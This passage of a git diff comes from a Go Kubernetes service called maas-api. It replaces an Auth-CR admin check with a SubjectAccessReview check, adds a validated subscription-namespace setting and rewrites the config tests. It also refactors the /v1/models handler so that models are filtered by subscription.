+			capturedSAR.Status.Allowed = true
+			return true, capturedSAR, nil
+		})
+
+		checker := auth.NewSARAdminChecker(client, "custom-namespace")
+		user := &token.UserContext{Username: "alice", Groups: []string{"users"}}
+
+		checker.IsAdmin(context.Background(), user)
+
+		require.NotNil(t, capturedSAR)
+		assert.Equal(t, "custom-namespace", capturedSAR.Spec.ResourceAttributes.Namespace)
+		assert.Equal(t, "create", capturedSAR.Spec.ResourceAttributes.Verb)
+		assert.Equal(t, "maas.opendatahub.io", capturedSAR.Spec.ResourceAttributes.Group)
+		assert.Equal(t, "maasauthpolicies", capturedSAR.Spec.ResourceAttributes.Resource)
+	})
+}
diff --git a/maas-api/internal/config/cluster_config.go b/maas-api/internal/config/cluster_config.go
index a8143100f..28b7878a0 100644
--- a/maas-api/internal/config/cluster_config.go
+++ b/maas-api/internal/config/cluster_config.go
@@ -6,7 +6,6 @@ import (
 
 	"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
 	"k8s.io/apimachinery/pkg/labels"
-	"k8s.io/apimachinery/pkg/runtime/schema"
 	"k8s.io/client-go/dynamic"
 	"k8s.io/client-go/dynamic/dynamicinformer"
 	"k8s.io/client-go/informers"
@@ -34,8 +33,9 @@ type ClusterConfig struct {
 	// MaaSSubscriptionLister lists MaaSSubscription CRs from the informer cache for subscription selection.
 	MaaSSubscriptionLister subscription.Lister
 
-	// AdminChecker checks if a user is an admin based on Auth CR (services.opendatahub.io/v1alpha1).
-	AdminChecker *auth.AdminChecker
+	// AdminChecker uses SubjectAccessReview to check if a user is an admin.
+	// Admin is determined by RBAC: can user create maasauthpolicies in the configured MaaS namespace?
+	AdminChecker *auth.SARAdminChecker
 
 	informersSynced []cache.InformerSynced
 	startFuncs      []func(<-chan struct{})
@@ -46,7 +46,7 @@ type maasModelRefLister struct {
 	lister cache.GenericLister
 }
 
-func (m *maasModelRefLister) List(namespace string) ([]*unstructured.Unstructured, error) {
+func (m *maasModelRefLister) List() ([]*unstructured.Unstructured, error) {
 	objs, err := m.lister.List(labels.Everything())
 	if err != nil {
 		return nil, err
@@ -57,9 +57,7 @@ func (m *maasModelRefLister) List(namespace string) ([]*unstructured.Unstructure
 		if !ok {
 			continue
 		}
-		if namespace != "" && u.GetNamespace() != namespace {
-			continue
-		}
+		// Return all MaaSModelRefs from all namespaces (no filtering)
 		out = append(out, u)
 	}
 	return out, nil
@@ -86,7 +84,7 @@ func (s *subscriptionLister) List() ([]*unstructured.Unstructured, error) {
 	return out, nil
 }
 
-func NewClusterConfig(namespace string, resyncPeriod time.Duration) (*ClusterConfig, error) {
+func NewClusterConfig(namespace, subscriptionNamespace string, resyncPeriod time.Duration) (*ClusterConfig, error) {
 	restConfig, err := LoadRestConfig()
 	if err != nil {
 		return nil, fmt.Errorf("failed to create kubernetes config: %w", err)
@@ -115,20 +113,16 @@ func NewClusterConfig(namespace string, resyncPeriod time.Duration) (*ClusterCon
 	maasInformer := maasDynamicFactory.ForResource(maasGVR)
 	maasModelRefListerVal := &maasModelRefLister{lister: maasInformer.Lister()}
 
-	// MaaSSubscription informer (cached); watches all namespaces for subscription selection.
+	// MaaSSubscription informer (cached); watches only the configured namespace for subscription selection.
+	subscriptionDynamicFactory := dynamicinformer.NewFilteredDynamicSharedInformerFactory(dynamicClient, resyncPeriod, subscriptionNamespace, nil)
 	subscriptionGVR := subscription.GVR()
-	subscriptionInformer := maasDynamicFactory.ForResource(subscriptionGVR)
+	subscriptionInformer := subscriptionDynamicFactory.ForResource(subscriptionGVR)
 	maasSubscriptionListerVal := &subscriptionLister{lister: subscriptionInformer.Lister()}
 
-	// Auth CR informer (cluster-scoped); used to determine admin groups from services.platform.opendatahub.io/v1alpha1/Auth.
-	// The Auth CR is a singleton named "auth" that defines adminGroups and allowedGroups.
-	authGVR := schema.GroupVersionResource{
-		Group:    "services.platform.opendatahub.io",
-		Version:  "v1alpha1",
-		Resource: "auths",
-	}
-	authInformer := maasDynamicFactory.ForResource(authGVR)
-	adminCheckerVal := auth.NewAdminChecker(authInformer.Lister())
+	// SAR-based admin checker: uses SubjectAccessReview to check RBAC permissions.
+	// Admin is determined by: can user create maasauthpolicies in the MaaS namespace?
+	// This aligns with RBAC from opendatahub-operator#3301 which grants admin groups CRUD access to MaaS resources.
+	adminCheckerVal := auth.NewSARAdminChecker(clientset, subscriptionNamespace)
 
 	return &ClusterConfig{
 		ClientSet: clientset,
@@ -147,12 +141,12 @@ func NewClusterConfig(namespace string, resyncPeriod time.Duration) (*ClusterCon
 			saInformer.Informer().HasSynced,
 			maasInformer.Informer().HasSynced,
 			subscriptionInformer.Informer().HasSynced,
-			authInformer.Informer().HasSynced,
 		},
 		startFuncs: []func(<-chan struct{}){
 			coreFactory.Start,
 			coreFactoryNs.Start,
 			maasDynamicFactory.Start,
+			subscriptionDynamicFactory.Start,
 		},
 	}, nil
 }
diff --git a/maas-api/internal/config/config.go b/maas-api/internal/config/config.go
index b7eb32815..3c9627163 100644
--- a/maas-api/internal/config/config.go
+++ b/maas-api/internal/config/config.go
@@ -5,8 +5,10 @@ import (
 	"errors"
 	"flag"
 	"fmt"
+	"strings"
 
 	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+	"k8s.io/apimachinery/pkg/util/validation"
 	"k8s.io/client-go/kubernetes"
 	"k8s.io/utils/env"
 
@@ -26,6 +28,8 @@ type Config struct {
 	GatewayName      string
 	GatewayNamespace string
 
+	MaaSSubscriptionNamespace string
+
 	// Server configuration
 	Address string // Listen address for HTTPS (host:port)
 	Secure  bool   // Use HTTPS
@@ -37,10 +41,6 @@ type Config struct {
 	// Format: postgresql://user:password@host:port/database
 	DBConnectionURL string
 
-	// APIKeyExpirationPolicy controls whether API keys must have expiration
-	// Values: "optional" (default) or "required"
-	APIKeyExpirationPolicy string
-
 	// APIKeyMaxExpirationDays is the maximum allowed expiration in days for API keys.
 	// Users cannot create API keys with expiration longer than this value.
 	// Default: 30 days. Minimum: 1 day.
@@ -58,17 +58,17 @@ func Load() *Config {
 	maxExpirationDays, _ := env.GetInt("API_KEY_MAX_EXPIRATION_DAYS", constant.DefaultAPIKeyMaxExpirationDays)
 
 	c := &Config{
-		Name:                    env.GetString("INSTANCE_NAME", gatewayName),
-		Namespace:               env.GetString("NAMESPACE", constant.DefaultNamespace),
-		GatewayName:             gatewayName,
-		GatewayNamespace:        env.GetString("GATEWAY_NAMESPACE", constant.DefaultGatewayNamespace),
-		Address:                 env.GetString("ADDRESS", ""),
-		Secure:                  secure,
-		TLS:                     loadTLSConfig(),
-		DebugMode:               debugMode,
-		DBConnectionURL:         "", // Loaded from K8s secret via LoadDatabaseURL()
-		APIKeyExpirationPolicy:  env.GetString("API_KEY_EXPIRATION_POLICY", "optional"),
-		APIKeyMaxExpirationDays: maxExpirationDays,
+		Name:                      env.GetString("INSTANCE_NAME", gatewayName),
+		Namespace:                 env.GetString("NAMESPACE", constant.DefaultNamespace),
+		GatewayName:               gatewayName,
+		GatewayNamespace:          env.GetString("GATEWAY_NAMESPACE", constant.DefaultGatewayNamespace),
+		MaaSSubscriptionNamespace: env.GetString("MAAS_SUBSCRIPTION_NAMESPACE", constant.DefaultMaaSSubscriptionNamespace),
+		Address:                   env.GetString("ADDRESS", ""),
+		Secure:                    secure,
+		TLS:                       loadTLSConfig(),
+		DebugMode:                 debugMode,
+		DBConnectionURL:           "", // Loaded from K8s secret via LoadDatabaseURL()
+		APIKeyMaxExpirationDays:   maxExpirationDays,
 		// Deprecated env var (backward compatibility with pre-TLS version)
 		deprecatedHTTPPort: env.GetString("PORT", ""),
 	}
@@ -84,6 +84,7 @@ func (c *Config) bindFlags(fs *flag.FlagSet) {
 	fs.StringVar(&c.Namespace, "namespace", c.Namespace, "Namespace of the MaaS instance")
 	fs.StringVar(&c.GatewayName, "gateway-name", c.GatewayName, "Name of the Gateway that has MaaS capabilities")
 	fs.StringVar(&c.GatewayNamespace, "gateway-namespace", c.GatewayNamespace, "Namespace where MaaS-enabled Gateway is deployed")
+	fs.StringVar(&c.MaaSSubscriptionNamespace, "maas-subscription-namespace", c.MaaSSubscriptionNamespace, "Namespace where MaaSSubscription CRs are located")
 
 	fs.StringVar(&c.Address, "address", c.Address, "HTTPS listen address (default :8443)")
 	fs.BoolVar(&c.Secure, "secure", c.Secure, "Use HTTPS (default: false)")
@@ -128,9 +129,11 @@ func (c *Config) Validate() error {
 		}
 	}
 
-	// Validate API key expiration policy
-	if c.APIKeyExpirationPolicy != "optional" && c.APIKeyExpirationPolicy != "required" {
-		return errors.New("API_KEY_EXPIRATION_POLICY must be 'optional' or 'required'")
+	if strings.TrimSpace(c.MaaSSubscriptionNamespace) == "" {
+		return errors.New("MAAS_SUBSCRIPTION_NAMESPACE must be non-empty")
+	}
+	if errs := validation.IsDNS1123Label(c.MaaSSubscriptionNamespace); len(errs) > 0 {
+		return fmt.Errorf("MAAS_SUBSCRIPTION_NAMESPACE %q is invalid: %v", c.MaaSSubscriptionNamespace, errs)
 	}
 
 	// Validate API key max expiration days
diff --git a/maas-api/internal/config/config_test.go b/maas-api/internal/config/config_test.go
index a22ddbb2a..4d4958409 100644
--- a/maas-api/internal/config/config_test.go
+++ b/maas-api/internal/config/config_test.go
@@ -1,81 +1,266 @@
-package config_test
+package config //nolint:testpackage // tests access unexported fields
 
 import (
+	"crypto/tls"
+	"flag"
+	"os"
+	"strings"
 	"testing"
-
-	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/config"
 )
 
-func TestConfig_Validate_APIKeyMaxExpirationDays(t *testing.T) {
+const testGatewayName = "my-gateway"
+
+// resetGlobalFlags replaces flag.CommandLine with a fresh FlagSet so that
+// Load() can register its flags again without panicking.
+func resetGlobalFlags() {
+	flag.CommandLine = flag.NewFlagSet(os.Args[0], flag.ContinueOnError)
+}
+
+func TestLoad_EnvironmentVariables(t *testing.T) {
 	tests := []struct {
-		name      string
-		maxDays   int
-		wantError bool
-		errorMsg  string
+		name    string
+		envVars map[string]string
+		check   func(t *testing.T, cfg *Config)
 	}{
 		{
-			name:      "valid minimum value",
-			maxDays:   1,
-			wantError: false,
+			name:    "GATEWAY_NAME overrides GatewayName and Name defaults to it",
+			envVars: map[string]string{"GATEWAY_NAME": testGatewayName},
+			check: func(t *testing.T, cfg *Config) {
+				t.Helper()
+				if cfg.GatewayName != testGatewayName {
+					t.Errorf("expected GatewayName %q, got %q", testGatewayName, cfg.GatewayName)
+				}
+				// Name defaults to GatewayName when INSTANCE_NAME is not set
+				if cfg.Name != testGatewayName {
+					t.Errorf("expected Name to default to GatewayName %q, got %q", testGatewayName, cfg.Name)
+				}
+			},
+		},
+		{
+			name:    "INSTANCE_NAME and GATEWAY_NAME set independently",
+			envVars: map[string]string{"INSTANCE_NAME": "my-instance", "GATEWAY_NAME": testGatewayName},
+			check: func(t *testing.T, cfg *Config) {
+				t.Helper()
+				if cfg.Name != "my-instance" {
+					t.Errorf("expected Name 'my-instance', got %q", cfg.Name)
+				}
+				if cfg.GatewayName != testGatewayName {
+					t.Errorf("expected GatewayName %q, got %q", testGatewayName, cfg.GatewayName)
+				}
+			},
+		},
+	}
+
+	// All env vars that Load() reads, to be cleared before each subtest.
+	allEnvVars := []string{
+		"DEBUG_MODE", "GATEWAY_NAME", "SECURE", "INSTANCE_NAME",
+		"NAMESPACE", "GATEWAY_NAMESPACE", "ADDRESS",
+		"PORT",
+		"TLS_CERT", "TLS_KEY", "TLS_SELF_SIGNED",
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			resetGlobalFlags()
+
+			// Clear all config env vars first.
+			for _, key := range allEnvVars {
+				t.Setenv(key, "")
+				os.Unsetenv(key)
+			}
+
+			// Set the test-specific env vars.
+			for key, val := range tt.envVars {
+				t.Setenv(key, val)
+			}
+
+			cfg := Load()
+			tt.check(t, cfg)
+		})
+	}
+}
+
+// TestValidate covers Config.Validate:
+// required fields (DBConnectionURL),
+// TLS consistency (secure without certs, cert without key),
+// APIKeyMaxExpirationDays bounds,
+// and default address assignment.
+func TestValidate(t *testing.T) {
+	tests := []struct {
+		name        string
+		cfg         Config
+		expectError string
+	}{
+		{
+			name: "missing DBConnectionURL returns error",
+			cfg: Config{
+				DBConnectionURL: "",
+			},
+			expectError: "db connection URL is required",
+		},
+		{
+			name: "secure without TLS returns error",
+			cfg: Config{
+				DBConnectionURL: "postgresql://localhost/test",
+				Secure:          true,
+			},
+			expectError: "--secure requires either --tls-cert/--tls-key or --tls-self-signed",
 		},
 		{
-			name:      "valid default value",
-			maxDays:   30,
-			wantError: false,
+			name: "TLS cert without key returns error",
+			cfg: Config{
+				DBConnectionURL: "postgresql://localhost/test",
+				TLS:             TLSConfig{Cert: "/cert.pem"},
+			},
+			expectError: "--tls-cert and --tls-key must both be provided together",
 		},
 		{
-			name:      "valid large value",
-			maxDays:   365,
-			wantError: false,
+			name: "valid insecure config sets default address :8080",
+			cfg: Config{
+				DBConnectionURL:           "postgresql://localhost/test",
+				Secure:                    false,
+				APIKeyMaxExpirationDays:   30,
+				MaaSSubscriptionNamespace: "models-as-a-service",
+			},
 		},
 		{
-			name:      "invalid zero value",
-			maxDays:   0,
-			wantError: true,
-			errorMsg:  "must be at least 1",
+			name: "valid secure config with self-signed sets default address :8443",
+			cfg: Config{
+				DBConnectionURL:           "postgresql://localhost/test",
+				TLS:                       TLSConfig{SelfSigned: true, MinVersion: TLSVersion(tls.VersionTLS12)},
+				APIKeyMaxExpirationDays:   30,
+				MaaSSubscriptionNamespace: "models-as-a-service",
+			},
 		},
 		{
-			name:      "invalid negative value",
-			maxDays:   -1,
-			wantError: true,
-			errorMsg:  "must be at least 1",
+			name: "valid secure config with certs",
+			cfg: Config{
+				DBConnectionURL:           "postgresql://localhost/test",
+				TLS:                       TLSConfig{Cert: "/cert.pem", Key: "/key.pem", MinVersion: TLSVersion(tls.VersionTLS12)},
+				APIKeyMaxExpirationDays:   30,
+				MaaSSubscriptionNamespace: "models-as-a-service",
+			},
+		},
+		{
+			name: "APIKeyMaxExpirationDays valid minimum value",
+			cfg: Config{
+				DBConnectionURL:           "postgresql://localhost/test",
+				APIKeyMaxExpirationDays:   1,
+				MaaSSubscriptionNamespace: "models-as-a-service",
+			},
+		},
+		{
+			name: "APIKeyMaxExpirationDays valid default value",
+			cfg: Config{
+				DBConnectionURL:           "postgresql://localhost/test",
+				APIKeyMaxExpirationDays:   30,
+				MaaSSubscriptionNamespace: "models-as-a-service",
+			},
+		},
+		{
+			name: "APIKeyMaxExpirationDays valid large value",
+			cfg: Config{
+				DBConnectionURL:           "postgresql://localhost/test",
+				APIKeyMaxExpirationDays:   365,
+				MaaSSubscriptionNamespace: "models-as-a-service",
+			},
+		},
+		{
+			name: "APIKeyMaxExpirationDays zero returns error",
+			cfg: Config{
+				DBConnectionURL:           "postgresql://localhost/test",
+				APIKeyMaxExpirationDays:   0,
+				MaaSSubscriptionNamespace: "models-as-a-service",
+			},
+			expectError: "must be at least 1",
+		},
+		{
+			name: "APIKeyMaxExpirationDays negative returns error",
+			cfg: Config{
+				DBConnectionURL:           "postgresql://localhost/test",
+				APIKeyMaxExpirationDays:   -1,
+				MaaSSubscriptionNamespace: "models-as-a-service",
+			},
+			expectError: "must be at least 1",
 		},
 	}
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			c := &config.Config{
-				DBConnectionURL:         "postgresql://test:test@localhost/test",
-				APIKeyExpirationPolicy:  "optional",
-				APIKeyMaxExpirationDays: tt.maxDays,
-			}
+			// Clear TLS_MIN_VERSION to avoid interference from host environment.
+			t.Setenv("TLS_MIN_VERSION", "")
+			os.Unsetenv("TLS_MIN_VERSION")
 
-			err := c.Validate()
+			err := tt.cfg.Validate()
 
-			if tt.wantError {
+			if tt.expectError != "" {
 				if err == nil {
-					t.Errorf("expected error containing %q, got nil", tt.errorMsg)
-					return
+					t.Fatalf("expected error containing %q, got nil", tt.expectError)
+				}
+				if !strings.Contains(err.Error(), tt.expectError) {
+					t.Errorf("expected error containing %q, got %q", tt.expectError, err.Error())
+				}
+				return
+			}
+
+			if err != nil {
+				t.Fatalf("unexpected error: %v", err)
+			}
+
+			// Verify default address assignment for valid configs.
+			if tt.cfg.Secure {
+				if tt.cfg.Address != DefaultSecureAddr {
+					t.Errorf("expected Address %q for secure config, got %q", DefaultSecureAddr, tt.cfg.Address)
 				}
-				if tt.errorMsg != "" && !contains(err.Error(), tt.errorMsg) {
-					t.Errorf("expected error containing %q, got %q", tt.errorMsg, err.Error())
+			} else {
+				if tt.cfg.Address != DefaultInsecureAddr {
+					t.Errorf("expected Address %q for insecure config, got %q", DefaultInsecureAddr, tt.cfg.Address)
 				}
-			} else if err != nil {
-				t.Errorf("unexpected error: %v", err)
 			}
 		})
 	}
 }
 
-func contains(s, substr string) bool {
-	return len(s) >= len(substr) && (s == substr || len(s) > 0 && containsAt(s, substr))
-}
+func TestHandleDeprecatedFlags(t *testing.T) {
+	t.Run("deprecated port sets Address and clears Secure", func(t *testing.T) {
+		cfg := &Config{
+			Secure:             true,
+			deprecatedHTTPPort: "9090",
+		}
+		cfg.handleDeprecatedFlags()
 
-func containsAt(s, substr string) bool {
-	for i := 0; i <= len(s)-len(substr); i++ {
-		if s[i:i+len(substr)] == substr {
-			return true
+		if cfg.Secure {
+			t.Error("expected Secure to be false when deprecated port is used")
 		}
-	}
-	return false
+		if cfg.Address != ":9090" {
+			t.Errorf("expected Address ':9090', got %q", cfg.Address)
+		}
+	})
+
+	t.Run("deprecated port does not override existing Address", func(t *testing.T) {
+		cfg := &Config{
+			Address:            ":7777",
+			deprecatedHTTPPort: "9090",
+		}
+		cfg.handleDeprecatedFlags()
+
+		if cfg.Address != ":7777" {
+			t.Errorf("expected Address ':7777' to be preserved, got %q", cfg.Address)
+		}
+	})
+
+	t.Run("no deprecated port is a no-op", func(t *testing.T) {
+		cfg := &Config{
+			Secure:  true,
+			Address: ":8443",
+		}
+		cfg.handleDeprecatedFlags()
+
+		if !cfg.Secure {
+			t.Error("expected Secure to remain true")
+		}
+		if cfg.Address != ":8443" {
+			t.Errorf("expected Address ':8443', got %q", cfg.Address)
+		}
+	})
 }
diff --git a/maas-api/internal/constant/const.go b/maas-api/internal/constant/const.go
index db5ec10a9..0fdd064d3 100644
--- a/maas-api/internal/constant/const.go
+++ b/maas-api/internal/constant/const.go
@@ -3,10 +3,11 @@ package constant
 import "time"
 
 const (
-	TierMappingConfigMap    = "tier-to-group-mapping"
-	DefaultNamespace        = "maas-api"
-	DefaultGatewayName      = "maas-default-gateway"
-	DefaultGatewayNamespace = "openshift-ingress"
+	TierMappingConfigMap             = "tier-to-group-mapping"
+	DefaultNamespace                 = "maas-api"
+	DefaultGatewayName               = "maas-default-gateway"
+	DefaultGatewayNamespace          = "openshift-ingress"
+	DefaultMaaSSubscriptionNamespace = "models-as-a-service"
 
 	DefaultResyncPeriod = 8 * time.Hour
 
@@ -16,10 +17,11 @@ const (
 
 	// API Key configuration defaults.
 	// DefaultAPIKeyMaxExpirationDays is the default maximum allowed expiration for API keys.
-	DefaultAPIKeyMaxExpirationDays = 30
+	DefaultAPIKeyMaxExpirationDays = 90
 
 	// LLMInferenceService annotation keys for model metadata.
-	AnnotationGenAIUseCase = "opendatahub.io/genai-use-case"
-	AnnotationDescription  = "openshift.io/description"
-	AnnotationDisplayName  = "openshift.io/display-name"
+	AnnotationGenAIUseCase  = "opendatahub.io/genai-use-case"
+	AnnotationDescription   = "openshift.io/description"
+	AnnotationDisplayName   = "openshift.io/display-name"
+	AnnotationContextWindow = "opendatahub.io/context-window"
 )
diff --git a/maas-api/internal/handlers/models.go b/maas-api/internal/handlers/models.go
index 55f58fdb0..e9dbf2bf1 100644
--- a/maas-api/internal/handlers/models.go
+++ b/maas-api/internal/handlers/models.go
@@ -3,6 +3,7 @@ package handlers
 import (
 	"errors"
 	"net/http"
+	"sort"
 	"strings"
 
 	"github.com/gin-gonic/gin"
@@ -20,7 +21,6 @@ type ModelsHandler struct {
 	subscriptionSelector *subscription.Selector
 	logger               *logger.Logger
 	maasModelRefLister   models.MaaSModelRefLister
-	maasModelNamespace   string
 }
 
 // NewModelsHandler creates a new models handler.
@@ -30,7 +30,6 @@ func NewModelsHandler(
 	modelMgr *models.Manager,
 	subscriptionSelector *subscription.Selector,
 	maasModelRefLister models.MaaSModelRefLister,
-	maasModelNamespace string,
 ) *ModelsHandler {
 	if log == nil {
 		log = logger.Production()
@@ -40,10 +39,137 @@ func NewModelsHandler(
 		subscriptionSelector: subscriptionSelector,
 		logger:               log,
 		maasModelRefLister:   maasModelRefLister,
-		maasModelNamespace:   maasModelNamespace,
 	}
 }
 
+// selectSubscriptionsForListing determines which subscriptions to use for model listing.
+// Returns the subscriptions list and a shouldReturn flag (true if the handler should return early).
+func (h *ModelsHandler) selectSubscriptionsForListing(
+	c *gin.Context,
+	userContext *token.UserContext,
+	requestedSubscription string,
+	returnAllModels bool,
+) ([]*subscription.SelectResponse, bool) {
+	if returnAllModels {
+		// User token authentication - return all models across all accessible subscriptions
+		if h.subscriptionSelector != nil {
+			allSubs, err := h.subscriptionSelector.GetAllAccessible(userContext.Groups, userContext.Username)
+			if err != nil {
+				h.logger.Error("Failed to get all accessible subscriptions", "error", err)
+				c.JSON(http.StatusInternalServerError, gin.H{
+					"error": gin.H{
+						"message": "Failed to get subscriptions",
+						"type":    "server_error",
+					}})
+				return nil, true
+			}
+			h.logger.Debug("User token - returning models from all accessible subscriptions", "subscriptionCount", len(allSubs))
+			return allSubs, false
+		}
+		// No selector configured - cannot return all models
+		h.logger.Debug("Subscription selector not configured")
+		c.JSON(http.StatusInternalServerError, gin.H{
+			"error": gin.H{
+				"message": "Subscription system not configured",
+				"type":    "server_error",
+			}})
+		return nil, true
+	}
+
+	// API key authentication - filter by the subscription bound to the key
+	if h.subscriptionSelector != nil {
+		//nolint:unqueryvet,nolintlint // Select is a method, not a SQL query
+		result, err := h.subscriptionSelector.Select(userContext.Groups, userContext.Username, requestedSubscription, "")
+		if err != nil {
+			h.handleSubscriptionSelectionError(c, err)
+			return nil, true
+		}
+		h.logger.Debug("API key - filtering by subscription", "subscription", result.Name)
+		return []*subscription.SelectResponse{result}, false
+	}
+
+	// If no selector configured and no subscription header provided, return empty
+	// (don't create synthetic subscription metadata)
+	if requestedSubscription == "" {
+		return nil, false
+	}
+
+	// Use the requested subscription header as-is (for legacy deployments without subscription selector)
+	return []*subscription.SelectResponse{{Name: requestedSubscription}}, false
+}
+
+// handleSubscriptionSelectionError handles errors from subscription selection and sends appropriate HTTP responses.
+func (h *ModelsHandler) handleSubscriptionSelectionError(c *gin.Context, err error) {
+	var multipleSubsErr *subscription.MultipleSubscriptionsError
+	var accessDeniedErr *subscription.AccessDeniedError
+	var notFoundErr *subscription.SubscriptionNotFoundError
+	var noSubErr *subscription.NoSubscriptionError
+
+	// For consistency with inferencing (which uses Authorino and returns 403 for all
+	// subscription errors), we return 403 Forbidden for all subscription-related errors.
+	if errors.As(err, &multipleSubsErr) {
+		// This should not happen with API keys (subscription is bound at mint time)
+		// If it does, it indicates the API key was minted without a subscription
+		h.logger.Debug("API key has no subscription bound - invalid state",
+			"subscriptionCount", len(multipleSubsErr.Subscriptions),
+		)
+		c.JSON(http.StatusForbidden, gin.H{
+			"error": gin.H{
+				"message": "API key has no subscription bound",
+				"type":    "permission_error",
+			}})
+		return
+	}
+
+	if errors.As(err, &accessDeniedErr) {
+		h.logger.Debug("Access denied to subscription")
+		c.JSON(http.StatusForbidden, gin.H{
+			"error": gin.H{
+				"message": err.Error(),
+				"type":    "permission_error",
+			}})
+		return
+	}
+
+	if errors.As(err, &notFoundErr) {
+		h.logger.Debug("Subscription not found")
+		c.JSON(http.StatusForbidden, gin.H{
+			"error": gin.H{
+				"message": err.Error(),
+				"type":    "permission_error",
+			}})
+		return
+	}
+
+	if errors.As(err, &noSubErr) {
+		h.logger.Debug("No subscription found for user")
+		c.JSON(http.StatusForbidden, gin.H{
+			"error": gin.H{
+				"message": err.Error(),
+				"type":    "permission_error",
+			}})
+		return
+	}
+
+	// Other errors are internal server errors
+	h.logger.Error("Subscription selection failed", "error", err)
+	c.JSON(http.StatusInternalServerError, gin.H{
+		"error": gin.H{
+			"message": "Failed to select subscription",
+			"type":    "server_error",
+		}})
+}
+
+// addSubscriptionIfNew adds a subscription to the model's subscriptions array if not already present.
+func (h *ModelsHandler) addSubscriptionIfNew(model *models.Model, subInfo models.SubscriptionInfo) {
+	for _, existingSub := range model.Subscriptions {
+		if existingSub.Name == subInfo.Name {
+			return
+		}
+	}
+	model.Subscriptions = append(model.Subscriptions, subInfo)
+}
+
 // ListLLMs handles GET /v1/models.
 func (h *ModelsHandler) ListLLMs(c *gin.Context) {
 	// Require Authorization header and pass it through as-is to list and access validation.
@@ -58,16 +184,32 @@ func (h *ModelsHandler) ListLLMs(c *gin.Context) {
 		return
 	}
 
-	// Extract x-maas-subscription header to pass through to model endpoints for authorization checks.
-	// This is required for users with multiple subscriptions.
+	// Extract x-maas-subscription header.
+	// For API keys: Authorino injects this from auth.metadata.apiKeyValidation.subscription
+	// For user tokens: This header is not present (Authorino doesn't inject it)
 	requestedSubscription := strings.TrimSpace(c.GetHeader("x-maas-subscription"))
+	isAPIKeyRequest := strings.HasPrefix(authHeader, "Bearer sk-oai-")
+
+	// Fail closed: API keys without a bound subscription must be rejected
+	if isAPIKeyRequest && requestedSubscription == "" {
+		h.logger.Debug("API key request missing bound subscription header")
+		c.JSON(http.StatusForbidden, gin.H{
+			"error": gin.H{
+				"message": "API key has no subscription bound",
+				"type":    "permission_error",
+			}})
+		return
+	}
+
+	// Determine behavior based on auth method:
+	// - API key with subscription → filter by that subscription (requestedSubscription != "")
+	// - User token → return all accessible models (requestedSubscription == "")
+	returnAllModels := !isAPIKeyRequest && requestedSubscription == ""
 
-	// Validate subscription access before probing models.
-	// This ensures consistent error handling with inferencing endpoints.
-	var selectedSubscription string
+	// Get user context for subscription selection
+	var userContext *token.UserContext
 	if h.subscriptionSelector != nil {
 		// Extract user info from context (set by ExtractUserInfo middleware)
-		// Only needed when subscription selector is configured
 		userContextVal, exists := c.Get("user")
 		if !exists {
 			h.logger.Error("User context not found - ExtractUserInfo middleware not called")
@@ -78,7 +220,8 @@ func (h *ModelsHandler) ListLLMs(c *gin.Context) {
 				}})
 			return
 		}
-		userContext, ok := userContextVal.(*token.UserContext)
+		var ok bool
+		userContext, ok = userContextVal.(*token.UserContext)
 		if !ok {
 			h.logger.Error("Invalid user context type")
 			c.JSON(http.StatusInternalServerError, gin.H{
@@ -88,80 +231,28 @@ func (h *ModelsHandler) ListLLMs(c *gin.Context) {
 				}})
 			return
 		}
+	}
 
-		result, err := h.subscriptionSelector.Select(userContext.Groups, userContext.Username, requestedSubscription)
-		if err != nil {
-			var multipleSubsErr *subscription.MultipleSubscriptionsError
-			var accessDeniedErr *subscription.AccessDeniedError
-			var notFoundErr *subscription.SubscriptionNotFoundError
-			var noSubErr *subscription.NoSubscriptionError
-
-			// For consistency with inferencing (which uses Authorino and returns 403 for all
-			// subscription errors), we return 403 Forbidden for all subscription-related errors.
-			if errors.As(err, &multipleSubsErr) {
-				h.logger.Debug("User has multiple subscriptions, x-maas-subscription header required",
-					"subscriptionCount", len(multipleSubsErr.Subscriptions),
-				)
-				c.JSON(http.StatusForbidden, gin.H{
-					"error": gin.H{
-						"message": err.Error(),
-						"type":    "permission_error",
-					}})
-				return
-			}
-
-			if errors.As(err, &accessDeniedErr) {
-				h.logger.Debug("Access denied to subscription")
-				c.JSON(http.StatusForbidden, gin.H{
-					"error": gin.H{
-						"message": err.Error(),
-						"type":    "permission_error",
-					}})
-				return
-			}
-
-			if errors.As(err, &notFoundErr) {
-				h.logger.Debug("Subscription not found")
-				c.JSON(http.StatusForbidden, gin.H{
-					"error": gin.H{
-						"message": err.Error(),
-						"type":    "permission_error",
-					}})
-				return
-			}
-
-			if errors.As(err, &noSubErr) {
-				h.logger.Debug("No subscription found for user")
-				c.JSON(http.StatusForbidden, gin.H{
-					"error": gin.H{
-						"message": err.Error(),
-						"type":    "permission_error",
-					}})
-				return
-			}
-
-			// Other errors are internal server errors
-			h.logger.Error("Subscription selection failed",
-				"error", err,
-			)
-			c.JSON(http.StatusInternalServerError, gin.H{
-				"error": gin.H{
-					"message": "Failed to select subscription",
-					"type":    "server_error",
-				}})
-			return
-		}
-		// Use the selected subscription (which may be auto-selected if user only has one)
-		selectedSubscription = result.Name
+	// Log the authentication method and filtering behavior
+	if requestedSubscription != "" {
+		h.logger.Debug("API key request - filtering models by subscription",
+			"subscription", requestedSubscription,
+		)
 	} else {
-		// If no selector configured, use the requested subscription header as-is
-		selectedSubscription = requestedSubscription
+		h.logger.Debug("User token request - returning all accessible models")
+	}
+
+	// Determine which subscriptions to use for model filtering
+	subscriptionsToUse, shouldReturn := h.selectSubscriptionsForListing(c, userContext, requestedSubscription, returnAllModels)
+	if shouldReturn {
+		return
 	}
 
-	var modelList []models.Model
-	if h.maasModelRefLister != nil && h.maasModelNamespace != "" {
-		h.logger.Debug("Listing models from MaaSModelRef cache", "namespace", h.maasModelNamespace)
-		list, err := models.ListFromMaaSModelRefLister(h.maasModelRefLister, h.maasModelNamespace)
+	// Initialize to empty slice (not nil) so JSON marshals as [] instead of null
+	modelList := []models.Model{}
+	if h.maasModelRefLister != nil {
+		h.logger.Debug("Listing models from MaaSModelRef cache (all namespaces)")
+		list, err := models.ListFromMaaSModelRefLister(h.maasModelRefLister)
 		if err != nil {
 			h.logger.Error("Listing from MaaSModelRef failed", "error", err)
 			c.JSON(http.StatusInternalServerError, gin.H{
